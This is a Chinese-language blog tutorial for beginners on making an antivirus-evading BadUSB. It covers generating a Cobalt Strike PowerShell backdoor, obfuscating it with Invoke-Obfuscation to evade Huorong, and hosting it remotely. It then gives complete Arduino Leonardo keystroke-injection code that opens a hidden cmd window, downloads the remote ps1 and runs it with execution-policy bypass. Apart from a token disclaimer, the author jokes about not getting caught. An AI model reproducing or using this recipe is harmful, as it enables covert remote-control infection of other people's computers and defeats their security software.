简易免杀Bad Usb 此文章适合新手

前言

最近很多都在问免杀的问题,今天专门给会员找了一篇关于BadUSB免杀的文章,可以过火绒的扫描,插上U盘战斗力爆表。

不过还是提醒大家,不要用本篇提供的教程从事违法的事情

0x01 简单免杀制作

 

1.CobaltStrike 服务端准备

8B67D27D-D361-454B-AFD9-3BFAED0086FF.jpeg

启动服务端命令

./teamserver 192.168.1.6 adm1nt1st

2.CobaltStrike 客户端登录并导出 PS 远控

输入服务端 IP 端口密码,用户名随意写

F3BB2694-5C99-473B-B7E5-5CC44893ED74.jpeg

设置监听器

020721C1-F415-4555-8865-D2FFFBDD7493.jpeg

Payload 默认即可,端口尽量别冲突

06FD1B49-1693-4657-AC7B-A7C0FA8A69FC.jpeg

选择 Payload 后门生成

988BC95B-A8AB-437C-AB97-2195E52768B9.jpeg

生成 PowerShell

039CCE65-E350-4D8F-9323-4F3F4E3F67B3.jpeg

运行保存在桌面的 payload.ps1,在杀软全程开启的情况下直接上线(易翻车,运气好)

08DA213A-B317-4874-AFB7-786AA6DEF88F.jpeg

3.编码混淆

 

PowerShell 的免杀可以用 Invoke-Obfuscation,Invoke-Obfuscation 主要是对 ps1 脚本进行免杀,需要现有一个 ps 的payload。

 

进入 Invoke-Obfuscation 目录后,在 PowerShell 中执行命令

Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation

EB89F7A5-0601-4943-B5CF-39500DF5043F.jpeg

 

然后执行命令,指定待处理的 Ps1 文件

set scriptpath c:\xxx\payload.ps1

或者指定待处理的 ps 代码

set scriptblock 'echo xss'

F31FE519-637A-4073-AB77-3EAA15DDED5B.jpeg

输入 encoding 并选择编码方式,比如 1

994BCB9D-0C38-4B7C-90BE-D45D483C4C00.jpeg

输入命令,导出免杀 ps 文件到指定路径

out C:\xxx\xxx.ps1

F8D049BE-D23E-444A-B2C1-4BB4158C3B76.jpeg

运行上线,至此,简单免杀制作完成

53E18339-26D7-44ED-816A-C61F0BC4D387.jpeg

4.放到远程服务器备用

6AFB4F42-DF2A-435A-AEBF-A60A7DE6FF67.jpeg

0x02 BadUsb 制作

将硬件插入电脑

2.打开 Arduino IDE

 

工具 -> 板 -> 选择 “Arduino Leonardo”

FDAC7304-EFE6-4440-8C93-B3666BECE6B7.jpeg

端口 -> 选择 “COM (Arduino Leonardo

C1EA9E45-D19D-45A4-9DDF-5B378B73D921.jpeg

void setup()
{
 // putpower shell your setup code here, to run once
 Keyboard.begin();//开始键盘通讯
delay(3000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500); 
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r'); 
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD /q /d /f:off /v:on /k MODE con: cols=15 lines=1"); //无回显
//Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\""); //有回显
delay(500);
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
delay(2000);
Keyboard.println("powershell");
Keyboard.println("$clnt = new-object system.net.webclient;");
Keyboard.println("$url= 'http://xx.xx.xx.xx/xxx.ps1';"); //远程服务器ps1远控地址
Keyboard.println("$file = 'd:\\xxx.ps1';"); //下载到目标存放文件的地址
Keyboard.println("$clnt.downloadfile($url,$file)"); //采用分段执行绕过防火墙进程防护
Keyboard.println("powershell.exe -executionpolicy bypass -file d:\\xxx.ps1"); //本地权限绕过执行木马脚本
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop() {
 // put your main code here, to run repeatedly:
}

 

代码大体意思:

插入BadUsb后等待3秒

按下Windows+R

切换大写绕开输入法

模拟输入字符串,最小化打开cmd窗口

隐藏输入特定命令,下载远控并调用powershell执行

 

4.接下来进行烧录程序

注意右下角,程序写到 BadUSB 里,别写错地方了,程序不报错证明成功

B8859986-CB63-496B-B8B0-2D3EA2483E62.jpeg

作者的话

测试我不放出来了以防小黑屋

希望各位搞搞得了

别去作死就行

死了也别把我说出来

 

原文地址:https://fendou.gqr5.cn/3196.html
------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就打个赏呗
点赞6 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容